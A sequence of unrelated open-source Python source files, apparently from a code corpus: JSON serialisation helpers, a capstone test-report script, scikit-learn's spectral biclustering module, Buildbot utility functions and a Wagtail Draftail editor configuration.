will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is false, all non-ASCII characters are not escaped, and
the return value may be a ``unicode`` instance. See ``dump`` for details.
If ``check_circular`` is false, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is false, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``) in
strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a non-negative integer, then JSON array elements and
object members will be pretty-printed with that indent level. An indent
level of 0 will only insert newlines. ``None`` is the most compact
representation. Since the default item separator is ``', '``, the
output might include trailing whitespace when ``indent`` is specified.
You can use ``separators=(',', ': ')`` to avoid this.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
If *sort_keys* is ``True`` (default: ``False``), then the output of
dictionaries will be sorted by key.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg; otherwise ``JSONEncoder`` is used.
"""
# cached encoder
if (not skipkeys and ensure_ascii and
check_circular and allow_nan and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and not sort_keys and not kw):
return _default_encoder.encode(obj)
if cls is None:
cls = JSONEncoder
return cls(
skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding, default=default,
sort_keys=sort_keys, **kw).encode(obj)
_default_decoder = JSONDecoder(encoding=None, object_hook=None,
object_pairs_hook=None)
def load(fp, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, object_pairs_hook=None, **kw):
"""Deserialize ``fp`` (a ``.read()``-supporting file-like object containing
a JSON document) to a Python object.
If the contents of ``fp`` is encoded with an ASCII based encoding other
than utf-8 (e.g. latin-1), then an appropriate ``encoding`` name must
be specified. Encodings that are not ASCII based (such as UCS-2) are
not allowed, and should be wrapped with
    ``codecs.getreader(encoding)(fp)``, or simply decoded to a ``unicode``
object and passed to ``loads()``
``object_hook`` is an optional function that will be called with the
result of any object literal decode (a ``dict``). The return value of
``object_hook`` will be used instead of the ``dict``. This feature
can be used to implement custom decoders (e.g. JSON-RPC class hinting).
``object_pairs_hook`` is an optional function that will be called with the
result of any object literal decoded with an ordered list of pairs. The
return value of ``object_pairs_hook`` will be used instead of the ``dict``.
This feature can be used to implement custom decoders that rely on the
order that the key and value pairs are decoded (for example,
collections.OrderedDict will remember the order of insertion). If
``object_hook`` is also defined, the ``object_pairs_hook`` takes priority.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg; otherwise ``JSONDecoder`` is used.
"""
return loads(fp.read(),
encoding=encoding, cls=cls, object_hook=object_hook,
parse_float=parse_float, parse_int=parse_int,
parse_constant=parse_constant, object_pairs_hook=object_pairs_hook,
**kw)
def loads(s, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, object_pairs_hook=None, **kw):
"""Deserialize ``s`` (a ``str`` or ``unicode`` instance containing a JSON
document) to a Python object.
If ``s`` is a ``str`` instance and is encoded with an ASCII based encoding
other than utf-8 (e.g. latin-1) then an appropriate ``encoding`` name
must be specified. Encodings that are not ASCII based (such as UCS-2)
are not allowed and should be decoded to ``unicode`` first.
``object_hook`` is an optional function that will be called with the
result of any object literal decode (a ``dict``). The return value of
``object_hook`` will be used instead of the ``dict``. This feature
can be used to implement custom decoders (e.g. JSON-RPC class hinting).
``object_pairs_hook`` is an optional function that will be called with the
result of any object literal decoded with an ordered list of pairs. The
return value of ``object_pairs_hook`` will be used instead of the ``dict``.
This feature can be used to implement custom decoders that rely on the
order that the key and value pairs are decoded (for example,
collections.OrderedDict will remember the order of insertion). If
``object_hook`` is also defined, the ``object_pairs_hook`` takes priority.
``parse_float``, if specified, will be called with the string
of every JSON float to be decoded. By default this is equivalent to
float(num_str). This can be used to use another datatype or parser
for JSON floats (e.g. decimal.Decimal).
``parse_int``, if specified, will be called with the string
of every JSON int to be decoded. By default this is equivalent to
int(num_str). This can be used to use another datatype or parser
for JSON integers (e.g. float).
``parse_constant``, if specified, will be called with one of the
following strings: -Infinity, Infinity, NaN, null, true, false.
This can be used to raise an exception if invalid JSON numbers
are encountered.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg; otherwise ``JSONDecoder`` is used.
"""
if (cls is None and encoding is None and object_hook is None and
parse_int is None and parse_float is None and
parse_constant is None and object_pairs_hook is None and not kw):
return _default_decoder.decode(s)
if cls is None:
cls = JSONDecoder
if object_hook is not None:
kw['object_hook'] = object_hook
if object_pairs_hook is not None:
kw['object_pairs_hook'] = object_pairs_hook
if parse_float is not None:
kw['parse_float'] = parse_float
if parse_int is not None:
kw['parse_int'] = parse_int
if parse_constant is not None:
kw['parse_constant'] = parse_constant
return cls(encoding=encoding, **kw).decode(s)
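# Note (added for clarity): like dump() and dumps(), loads() reuses the shared
# module-level _default_decoder whenever no customisation is requested, so a
# plain loads('[1, 2]') avoids building a fresh JSONDecoder on every call.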
| mit |
AmesianX/capstone | suite/cstest/cstest_report.py | 7 | 2718 | #!/usr/bin/python
import re
import sys
import getopt
from subprocess import Popen, PIPE
from pprint import pprint as ppr
import os
def Usage(s):
print 'Usage: {} -t <cstest_path> [-f <file_name.cs>] [-d <directory>]'.format(s)
sys.exit(-1)
def get_report_file(toolpath, filepath, getDetails, cmt_out):
cmd = [toolpath, '-f', filepath]
process = Popen(cmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
# stdout
failed_tests = []
# print '---> stdout\n', stdout
# print '---> stderr\n', stderr
matches = re.finditer(r'\[\s+RUN\s+\]\s+(.*)\n\[\s+FAILED\s+\]', stdout)
for match in matches:
failed_tests.append(match.group(1))
# stderr
counter = 0
details = []
for line in stderr.split('\n'):
if '[ PASSED ] 0 test(s).' in line:
break
elif 'LINE' in line:
continue
elif 'ERROR' in line and ' --- ' in line:
parts = line.split(' --- ')
try:
details.append((parts[1], failed_tests[counter], parts[2]))
except IndexError:
details.append(('', 'Unknown test', line.split(' --- ')[1]))
counter += 1
else:
continue
print '\n[-] There are/is {} failed test(s)'.format(len(details))
if len(details) > 0 and getDetails:
print '[-] Detailed report for {}:\n'.format(filepath)
for c, f, d in details:
print '\t[+] {}: {}\n\t\t{}\n'.format(f, c, d)
print '\n'
return 0
elif len(details) > 0:
for c, f, d in details:
if len(f) > 0 and cmt_out is True:
tmp_cmd = ['sed', '-E', '-i.bak', 's/({})(.*)/\/\/ \\1\\2/g'.format(c), filepath]
sed_proc = Popen(tmp_cmd, stdout=PIPE, stderr=PIPE)
sed_proc.communicate()
tmp_cmd2 = ['rm', '-f', filepath + '.bak']
rm_proc = Popen(tmp_cmd2, stdout=PIPE, stderr=PIPE)
rm_proc.communicate()
        return 0
return 1
def get_report_folder(toolpath, folderpath, details, cmt_out):
result = 1
for root, dirs, files in os.walk(folderpath):
path = root.split(os.sep)
for f in files:
if f.split('.')[-1] == 'cs':
print '[-] Target:', f,
result *= get_report_file(toolpath, os.sep.join(x for x in path) + os.sep + f, details, cmt_out)
sys.exit(result ^ 1)
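# Note (added for clarity): get_report_file() returns 1 for a fully passing
# file, so the product `result` stays 1 only if every .cs file passed;
# `result ^ 1` then yields the conventional shell exit status (0 == success).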
if __name__ == '__main__':
Done = False
details = False
toolpath = ''
cmt_out = False
try:
opts, args = getopt.getopt(sys.argv[1:], "ct:f:d:D")
for opt, arg in opts:
if opt == '-f':
result = get_report_file(toolpath, arg, details, cmt_out)
if result == 0:
sys.exit(1)
Done = True
elif opt == '-d':
get_report_folder(toolpath, arg, details, cmt_out)
Done = True
elif opt == '-t':
toolpath = arg
elif opt == '-D':
details = True
elif opt == '-c':
cmt_out = True
except getopt.GetoptError:
Usage(sys.argv[0])
if Done is False:
Usage(sys.argv[0])
| bsd-3-clause |
joshloyal/scikit-learn | sklearn/cluster/bicluster.py | 26 | 19870 | """Spectral biclustering algorithms.
Authors : Kemal Eren
License: BSD 3 clause
"""
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import dia_matrix
from scipy.sparse import issparse
from . import KMeans, MiniBatchKMeans
from ..base import BaseEstimator, BiclusterMixin
from ..externals import six
from ..utils import check_random_state
from ..utils.arpack import eigsh, svds
from ..utils.extmath import (make_nonnegative, norm, randomized_svd,
safe_sparse_dot)
from ..utils.validation import assert_all_finite, check_array
__all__ = ['SpectralCoclustering',
'SpectralBiclustering']
def _scale_normalize(X):
"""Normalize ``X`` by scaling rows and columns independently.
Returns the normalized matrix and the row and column scaling
factors.
"""
X = make_nonnegative(X)
row_diag = np.asarray(1.0 / np.sqrt(X.sum(axis=1))).squeeze()
col_diag = np.asarray(1.0 / np.sqrt(X.sum(axis=0))).squeeze()
row_diag = np.where(np.isnan(row_diag), 0, row_diag)
col_diag = np.where(np.isnan(col_diag), 0, col_diag)
if issparse(X):
n_rows, n_cols = X.shape
r = dia_matrix((row_diag, [0]), shape=(n_rows, n_rows))
c = dia_matrix((col_diag, [0]), shape=(n_cols, n_cols))
an = r * X * c
else:
an = row_diag[:, np.newaxis] * X * col_diag
return an, row_diag, col_diag
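# Illustrative sketch (not part of the original module): for a dense matrix
# this computes D_r^{-1/2} * X * D_c^{-1/2} with D_r, D_c the row and column
# sums; e.g. X = [[1, 3], [2, 2]] has row sums [4, 4] and column sums [3, 5],
# so an[0, 0] == 1 / (sqrt(4) * sqrt(3)).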
def _bistochastic_normalize(X, max_iter=1000, tol=1e-5):
"""Normalize rows and columns of ``X`` simultaneously so that all
rows sum to one constant and all columns sum to a different
constant.
"""
# According to paper, this can also be done more efficiently with
# deviation reduction and balancing algorithms.
X = make_nonnegative(X)
X_scaled = X
dist = None
for _ in range(max_iter):
X_new, _, _ = _scale_normalize(X_scaled)
if issparse(X):
            dist = norm(X_scaled.data - X_new.data)
else:
dist = norm(X_scaled - X_new)
X_scaled = X_new
if dist is not None and dist < tol:
break
return X_scaled
def _log_normalize(X):
"""Normalize ``X`` according to Kluger's log-interactions scheme."""
X = make_nonnegative(X, min_value=1)
if issparse(X):
raise ValueError("Cannot compute log of a sparse matrix,"
" because log(x) diverges to -infinity as x"
" goes to 0.")
L = np.log(X)
row_avg = L.mean(axis=1)[:, np.newaxis]
col_avg = L.mean(axis=0)
avg = L.mean()
return L - row_avg - col_avg + avg
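# Illustrative sketch (not in the original source): the double centering
# K_ij = L_ij - mean_i(L) - mean_j(L) + mean(L) annihilates multiplicative
# row/column effects, e.g.
#   >>> import numpy as np
#   >>> np.allclose(_log_normalize(np.outer([1., 2.], [3., 4.])), 0)
#   True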
class BaseSpectral(six.with_metaclass(ABCMeta, BaseEstimator,
BiclusterMixin)):
"""Base class for spectral biclustering."""
@abstractmethod
def __init__(self, n_clusters=3, svd_method="randomized",
n_svd_vecs=None, mini_batch=False, init="k-means++",
n_init=10, n_jobs=1, random_state=None):
self.n_clusters = n_clusters
self.svd_method = svd_method
self.n_svd_vecs = n_svd_vecs
self.mini_batch = mini_batch
self.init = init
self.n_init = n_init
self.n_jobs = n_jobs
self.random_state = random_state
def _check_parameters(self):
legal_svd_methods = ('randomized', 'arpack')
if self.svd_method not in legal_svd_methods:
raise ValueError("Unknown SVD method: '{0}'. svd_method must be"
" one of {1}.".format(self.svd_method,
legal_svd_methods))
def fit(self, X):
"""Creates a biclustering for X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
"""
X = check_array(X, accept_sparse='csr', dtype=np.float64)
self._check_parameters()
self._fit(X)
return self
def _svd(self, array, n_components, n_discard):
"""Returns first `n_components` left and right singular
vectors u and v, discarding the first `n_discard`.
"""
if self.svd_method == 'randomized':
kwargs = {}
if self.n_svd_vecs is not None:
kwargs['n_oversamples'] = self.n_svd_vecs
u, _, vt = randomized_svd(array, n_components,
random_state=self.random_state,
**kwargs)
elif self.svd_method == 'arpack':
u, _, vt = svds(array, k=n_components, ncv=self.n_svd_vecs)
if np.any(np.isnan(vt)):
# some eigenvalues of A * A.T are negative, causing
# sqrt() to be np.nan. This causes some vectors in vt
# to be np.nan.
A = safe_sparse_dot(array.T, array)
random_state = check_random_state(self.random_state)
# initialize with [-1,1] as in ARPACK
v0 = random_state.uniform(-1, 1, A.shape[0])
_, v = eigsh(A, ncv=self.n_svd_vecs, v0=v0)
vt = v.T
if np.any(np.isnan(u)):
A = safe_sparse_dot(array, array.T)
random_state = check_random_state(self.random_state)
# initialize with [-1,1] as in ARPACK
v0 = random_state.uniform(-1, 1, A.shape[0])
_, u = eigsh(A, ncv=self.n_svd_vecs, v0=v0)
assert_all_finite(u)
assert_all_finite(vt)
u = u[:, n_discard:]
vt = vt[n_discard:]
return u, vt.T
def _k_means(self, data, n_clusters):
if self.mini_batch:
model = MiniBatchKMeans(n_clusters,
init=self.init,
n_init=self.n_init,
random_state=self.random_state)
else:
model = KMeans(n_clusters, init=self.init,
n_init=self.n_init, n_jobs=self.n_jobs,
random_state=self.random_state)
model.fit(data)
centroid = model.cluster_centers_
labels = model.labels_
return centroid, labels
class SpectralCoclustering(BaseSpectral):
"""Spectral Co-Clustering algorithm (Dhillon, 2001).
Clusters rows and columns of an array `X` to solve the relaxed
normalized cut of the bipartite graph created from `X` as follows:
the edge between row vertex `i` and column vertex `j` has weight
`X[i, j]`.
The resulting bicluster structure is block-diagonal, since each
row and each column belongs to exactly one bicluster.
Supports sparse matrices, as long as they are nonnegative.
Read more in the :ref:`User Guide <spectral_coclustering>`.
Parameters
----------
n_clusters : integer, optional, default: 3
The number of biclusters to find.
svd_method : string, optional, default: 'randomized'
Selects the algorithm for finding singular vectors. May be
'randomized' or 'arpack'. If 'randomized', use
:func:`sklearn.utils.extmath.randomized_svd`, which may be faster
for large matrices. If 'arpack', use
:func:`sklearn.utils.arpack.svds`, which is more accurate, but
possibly slower in some cases.
n_svd_vecs : int, optional, default: None
Number of vectors to use in calculating the SVD. Corresponds
to `ncv` when `svd_method=arpack` and `n_oversamples` when
        `svd_method` is 'randomized'.
mini_batch : bool, optional, default: False
Whether to use mini-batch k-means, which is faster but may get
different results.
init : {'k-means++', 'random' or an ndarray}
Method for initialization of k-means algorithm; defaults to
'k-means++'.
n_init : int, optional, default: 10
Number of random initializations that are tried with the
k-means algorithm.
If mini-batch k-means is used, the best initialization is
chosen and the algorithm runs once. Otherwise, the algorithm
is run for each initialization and the best solution chosen.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used by the K-Means
initialization.
Attributes
----------
rows_ : array-like, shape (n_row_clusters, n_rows)
Results of the clustering. `rows[i, r]` is True if
cluster `i` contains row `r`. Available only after calling ``fit``.
columns_ : array-like, shape (n_column_clusters, n_columns)
Results of the clustering, like `rows`.
row_labels_ : array-like, shape (n_rows,)
The bicluster label of each row.
column_labels_ : array-like, shape (n_cols,)
The bicluster label of each column.
References
----------
* Dhillon, Inderjit S, 2001. `Co-clustering documents and words using
bipartite spectral graph partitioning
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.140.3011>`__.
"""
def __init__(self, n_clusters=3, svd_method='randomized',
n_svd_vecs=None, mini_batch=False, init='k-means++',
n_init=10, n_jobs=1, random_state=None):
super(SpectralCoclustering, self).__init__(n_clusters,
svd_method,
n_svd_vecs,
mini_batch,
init,
n_init,
n_jobs,
random_state)
def _fit(self, X):
normalized_data, row_diag, col_diag = _scale_normalize(X)
n_sv = 1 + int(np.ceil(np.log2(self.n_clusters)))
u, v = self._svd(normalized_data, n_sv, n_discard=1)
z = np.vstack((row_diag[:, np.newaxis] * u,
col_diag[:, np.newaxis] * v))
_, labels = self._k_means(z, self.n_clusters)
n_rows = X.shape[0]
self.row_labels_ = labels[:n_rows]
self.column_labels_ = labels[n_rows:]
self.rows_ = np.vstack(self.row_labels_ == c
for c in range(self.n_clusters))
self.columns_ = np.vstack(self.column_labels_ == c
for c in range(self.n_clusters))
class SpectralBiclustering(BaseSpectral):
"""Spectral biclustering (Kluger, 2003).
Partitions rows and columns under the assumption that the data has
an underlying checkerboard structure. For instance, if there are
two row partitions and three column partitions, each row will
belong to three biclusters, and each column will belong to two
biclusters. The outer product of the corresponding row and column
label vectors gives this checkerboard structure.
Read more in the :ref:`User Guide <spectral_biclustering>`.
Parameters
----------
n_clusters : integer or tuple (n_row_clusters, n_column_clusters)
The number of row and column clusters in the checkerboard
structure.
method : string, optional, default: 'bistochastic'
Method of normalizing and converting singular vectors into
biclusters. May be one of 'scale', 'bistochastic', or 'log'.
The authors recommend using 'log'. If the data is sparse,
however, log normalization will not work, which is why the
default is 'bistochastic'. CAUTION: if `method='log'`, the
data must not be sparse.
n_components : integer, optional, default: 6
Number of singular vectors to check.
n_best : integer, optional, default: 3
Number of best singular vectors to which to project the data
for clustering.
svd_method : string, optional, default: 'randomized'
Selects the algorithm for finding singular vectors. May be
'randomized' or 'arpack'. If 'randomized', uses
`sklearn.utils.extmath.randomized_svd`, which may be faster
for large matrices. If 'arpack', uses
`sklearn.utils.arpack.svds`, which is more accurate, but
possibly slower in some cases.
n_svd_vecs : int, optional, default: None
Number of vectors to use in calculating the SVD. Corresponds
to `ncv` when `svd_method=arpack` and `n_oversamples` when
        `svd_method` is 'randomized'.
mini_batch : bool, optional, default: False
Whether to use mini-batch k-means, which is faster but may get
different results.
init : {'k-means++', 'random' or an ndarray}
Method for initialization of k-means algorithm; defaults to
'k-means++'.
n_init : int, optional, default: 10
Number of random initializations that are tried with the
k-means algorithm.
If mini-batch k-means is used, the best initialization is
chosen and the algorithm runs once. Otherwise, the algorithm
is run for each initialization and the best solution chosen.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used by the K-Means
initialization.
Attributes
----------
rows_ : array-like, shape (n_row_clusters, n_rows)
Results of the clustering. `rows[i, r]` is True if
cluster `i` contains row `r`. Available only after calling ``fit``.
columns_ : array-like, shape (n_column_clusters, n_columns)
Results of the clustering, like `rows`.
row_labels_ : array-like, shape (n_rows,)
Row partition labels.
column_labels_ : array-like, shape (n_cols,)
Column partition labels.
References
----------
* Kluger, Yuval, et. al., 2003. `Spectral biclustering of microarray
data: coclustering genes and conditions
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.135.1608>`__.
"""
def __init__(self, n_clusters=3, method='bistochastic',
n_components=6, n_best=3, svd_method='randomized',
n_svd_vecs=None, mini_batch=False, init='k-means++',
n_init=10, n_jobs=1, random_state=None):
super(SpectralBiclustering, self).__init__(n_clusters,
svd_method,
n_svd_vecs,
mini_batch,
init,
n_init,
n_jobs,
random_state)
self.method = method
self.n_components = n_components
self.n_best = n_best
def _check_parameters(self):
super(SpectralBiclustering, self)._check_parameters()
legal_methods = ('bistochastic', 'scale', 'log')
if self.method not in legal_methods:
raise ValueError("Unknown method: '{0}'. method must be"
" one of {1}.".format(self.method, legal_methods))
try:
int(self.n_clusters)
except TypeError:
try:
r, c = self.n_clusters
int(r)
int(c)
except (ValueError, TypeError):
raise ValueError("Incorrect parameter n_clusters has value:"
" {}. It should either be a single integer"
" or an iterable with two integers:"
" (n_row_clusters, n_column_clusters)")
if self.n_components < 1:
raise ValueError("Parameter n_components must be greater than 0,"
" but its value is {}".format(self.n_components))
if self.n_best < 1:
raise ValueError("Parameter n_best must be greater than 0,"
" but its value is {}".format(self.n_best))
if self.n_best > self.n_components:
raise ValueError("n_best cannot be larger than"
" n_components, but {} > {}"
"".format(self.n_best, self.n_components))
def _fit(self, X):
n_sv = self.n_components
if self.method == 'bistochastic':
normalized_data = _bistochastic_normalize(X)
n_sv += 1
elif self.method == 'scale':
normalized_data, _, _ = _scale_normalize(X)
n_sv += 1
elif self.method == 'log':
normalized_data = _log_normalize(X)
n_discard = 0 if self.method == 'log' else 1
u, v = self._svd(normalized_data, n_sv, n_discard)
ut = u.T
vt = v.T
try:
n_row_clusters, n_col_clusters = self.n_clusters
except TypeError:
n_row_clusters = n_col_clusters = self.n_clusters
best_ut = self._fit_best_piecewise(ut, self.n_best,
n_row_clusters)
best_vt = self._fit_best_piecewise(vt, self.n_best,
n_col_clusters)
self.row_labels_ = self._project_and_cluster(X, best_vt.T,
n_row_clusters)
self.column_labels_ = self._project_and_cluster(X.T, best_ut.T,
n_col_clusters)
self.rows_ = np.vstack(self.row_labels_ == label
for label in range(n_row_clusters)
for _ in range(n_col_clusters))
self.columns_ = np.vstack(self.column_labels_ == label
for _ in range(n_row_clusters)
for label in range(n_col_clusters))
def _fit_best_piecewise(self, vectors, n_best, n_clusters):
"""Find the ``n_best`` vectors that are best approximated by piecewise
constant vectors.
The piecewise vectors are found by k-means; the best is chosen
according to Euclidean distance.
"""
def make_piecewise(v):
centroid, labels = self._k_means(v.reshape(-1, 1), n_clusters)
return centroid[labels].ravel()
piecewise_vectors = np.apply_along_axis(make_piecewise,
axis=1, arr=vectors)
dists = np.apply_along_axis(norm, axis=1,
arr=(vectors - piecewise_vectors))
result = vectors[np.argsort(dists)[:n_best]]
return result
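    # Illustrative note (not from the original source): a vector such as
    # [1, 1, 5, 5] is fitted exactly by a piecewise-constant vector when
    # n_clusters=2, so its distance is ~0 and the argsort above ranks it
    # ahead of noisier singular vectors.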
def _project_and_cluster(self, data, vectors, n_clusters):
"""Project ``data`` to ``vectors`` and cluster the result."""
projected = safe_sparse_dot(data, vectors)
_, labels = self._k_means(projected, n_clusters)
return labels
| bsd-3-clause |
denny820909/builder | lib/python2.7/site-packages/buildbot_slave-0.8.8-py2.7.egg/buildslave/commands/utils.py | 4 | 3936 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import os
from twisted.python import log
from twisted.python.procutils import which
from twisted.python import runtime
def getCommand(name):
possibles = which(name)
if not possibles:
raise RuntimeError("Couldn't find executable for '%s'" % name)
#
# Under windows, if there is more than one executable "thing"
# that matches (e.g. *.bat, *.cmd and *.exe), we not just use
# the first in alphabet (*.bat/*.cmd) if there is a *.exe.
# e.g. under MSysGit/Windows, there is both a git.cmd and a
# git.exe on path, but we want the git.exe, since the git.cmd
# does not seem to work properly with regard to errors raised
# and catched in buildbot slave command (vcs.py)
#
if runtime.platformType == 'win32' and len(possibles) > 1:
possibles_exe = which(name + ".exe")
if possibles_exe:
return possibles_exe[0]
return possibles[0]
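# Example (hedged; the resolved path depends on the host PATH):
#   getCommand('git')  ->  e.g. '/usr/bin/git' on POSIX; on win32, 'git.exe'
#   is preferred over 'git.cmd', and RuntimeError is raised if nothing matches.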
# this just keeps pyflakes happy on non-Windows systems
if runtime.platformType != 'win32':
WindowsError = RuntimeError
if runtime.platformType == 'win32':
def rmdirRecursive(dir):
"""This is a replacement for shutil.rmtree that works better under
windows. Thanks to Bear at the OSAF for the code."""
if not os.path.exists(dir):
return
if os.path.islink(dir) or os.path.isfile(dir):
os.remove(dir)
return
# Verify the directory is read/write/execute for the current user
os.chmod(dir, 0700)
# os.listdir below only returns a list of unicode filenames if the parameter is unicode
# Thus, if a non-unicode-named dir contains a unicode filename, that filename will get garbled.
# So force dir to be unicode.
if not isinstance(dir, unicode):
try:
dir = unicode(dir, "utf-8")
except:
log.err("rmdirRecursive: decoding from UTF-8 failed (ignoring)")
try:
list = os.listdir(dir)
except WindowsError, e:
msg = ("rmdirRecursive: unable to listdir %s (%s). Trying to "
"remove like a dir" % (dir, e.strerror.decode('mbcs')))
log.msg(msg.encode('utf-8'))
os.rmdir(dir)
return
for name in list:
full_name = os.path.join(dir, name)
# on Windows, if we don't have write permission we can't remove
# the file/directory either, so turn that on
if os.name == 'nt':
if not os.access(full_name, os.W_OK):
# I think this is now redundant, but I don't have an NT
# machine to test on, so I'm going to leave it in place
# -warner
os.chmod(full_name, 0600)
if os.path.islink(full_name):
os.remove(full_name) # as suggested in bug #792
elif os.path.isdir(full_name):
rmdirRecursive(full_name)
else:
if os.path.isfile(full_name):
os.chmod(full_name, 0700)
os.remove(full_name)
os.rmdir(dir)
else:
# use rmtree on POSIX
import shutil
rmdirRecursive = shutil.rmtree
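# Usage sketch (illustrative only): both platform branches expose the same
# signature, so callers can simply write, e.g.
#   rmdirRecursive('/tmp/build-12')  # hypothetical path
# without caring whether shutil.rmtree or the Windows fallback runs.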
| mit |
gasman/wagtaildraftail | tests/testapp/testapp/grains/rich_text.py | 2 | 4646 | from __future__ import absolute_import, unicode_literals
from draftjs_exporter.constants import BLOCK_TYPES, ENTITY_TYPES, INLINE_STYLES
from draftjs_exporter.defaults import BLOCK_MAP
TERMS_BLOCK_ID = 'TERMS_AND_CONDITIONS_TEXT'
DRAFT_BLOCK_TYPE_H3 = {'label': 'H3', 'type': BLOCK_TYPES.HEADER_THREE}
DRAFT_BLOCK_TYPE_H4 = {'label': 'H4', 'type': BLOCK_TYPES.HEADER_FOUR}
DRAFT_BLOCK_TYPE_UL = {'label': 'UL', 'type': BLOCK_TYPES.UNORDERED_LIST_ITEM, 'icon': 'icon-list-ul'}
DRAFT_BLOCK_TYPE_OL = {'label': 'OL', 'type': BLOCK_TYPES.ORDERED_LIST_ITEM, 'icon': 'icon-list-ol'}
DRAFT_BLOCK_TYPE_TERMS = {'label': 'T&Cs', 'type': TERMS_BLOCK_ID, 'element': 'div', 'class': 'legals'}
DRAFT_INLINE_STYLE_BOLD = {'label': 'Bold', 'type': INLINE_STYLES.BOLD, 'icon': 'icon-bold'}
DRAFT_INLINE_STYLE_ITALIC = {'label': 'Italic', 'type': INLINE_STYLES.ITALIC, 'icon': 'icon-italic'}
# It accepts a list of dicts with `label` and `value` keys (e.g. `{'label': 'Full width', 'value': 'fullwidth'}`)
# or a special `__all__` value which will be intercepted and will load all image formats known to Wagtail.
DRAFT_IMAGE_FORMATS = '__all__'
DRAFT_ENTITY_TYPE_IMAGE = {
'label': 'Image',
'type': ENTITY_TYPES.IMAGE,
'icon': 'icon-image',
'imageFormats': DRAFT_IMAGE_FORMATS,
'source': 'ImageSource',
'decorator': 'Image',
}
DRAFT_ENTITY_TYPE_EMBED = {
'label': 'Embed',
'type': ENTITY_TYPES.EMBED,
'icon': 'icon-media',
'source': 'EmbedSource',
'decorator': 'Embed',
}
DRAFT_ENTITY_TYPE_LINK = {
'label': 'Link',
'type': ENTITY_TYPES.LINK,
'icon': 'icon-link',
'source': 'LinkSource',
'decorator': 'Link',
}
DRAFT_ENTITY_TYPE_DOCUMENT = {
'label': 'Document',
'type': ENTITY_TYPES.DOCUMENT,
'icon': 'icon-doc-full',
'source': 'DocumentSource',
'decorator': 'Document',
}
BUTTON_ENTITY_ID = 'BUTTON'
DRAFT_ENTITY_TYPE_BUTTON = {
'label': 'Button',
'type': BUTTON_ENTITY_ID,
'icon': 'icon-link',
'source': 'LinkSource',
'decorator': 'ButtonDecorator',
}
WAGTAILADMIN_RICH_TEXT_EDITORS = {
'simple': {
'WIDGET': 'wagtaildraftail.widgets.DraftailTextArea',
'OPTIONS': {
'enableHorizontalRule': True,
'enableLineBreak': False,
'entityTypes': [
DRAFT_ENTITY_TYPE_LINK,
DRAFT_ENTITY_TYPE_DOCUMENT,
],
'blockTypes': [
DRAFT_BLOCK_TYPE_H3,
DRAFT_BLOCK_TYPE_UL,
DRAFT_BLOCK_TYPE_TERMS,
],
'inlineStyles': [
DRAFT_INLINE_STYLE_BOLD,
DRAFT_INLINE_STYLE_ITALIC,
],
}
},
'default_draftail': {
'WIDGET': 'wagtaildraftail.widgets.DraftailTextArea',
'OPTIONS': {
'enableHorizontalRule': True,
'enableLineBreak': False,
'entityTypes': [
DRAFT_ENTITY_TYPE_IMAGE,
DRAFT_ENTITY_TYPE_EMBED,
DRAFT_ENTITY_TYPE_LINK,
DRAFT_ENTITY_TYPE_DOCUMENT,
DRAFT_ENTITY_TYPE_BUTTON,
],
'blockTypes': [
DRAFT_BLOCK_TYPE_H3,
DRAFT_BLOCK_TYPE_H4,
DRAFT_BLOCK_TYPE_UL,
DRAFT_BLOCK_TYPE_OL,
DRAFT_BLOCK_TYPE_TERMS,
],
'inlineStyles': [
DRAFT_INLINE_STYLE_BOLD,
DRAFT_INLINE_STYLE_ITALIC,
],
}
},
# Wagtail dependencies
'default': {
'WIDGET': 'wagtail.wagtailadmin.rich_text.HalloRichTextArea'
},
'custom': {
'WIDGET': 'wagtail.tests.testapp.rich_text.CustomRichTextArea'
},
}
DRAFT_EXPORTER_ENTITY_DECORATORS = {
ENTITY_TYPES.LINK: 'wagtaildraftail.decorators.Link',
ENTITY_TYPES.DOCUMENT: 'wagtaildraftail.decorators.Document',
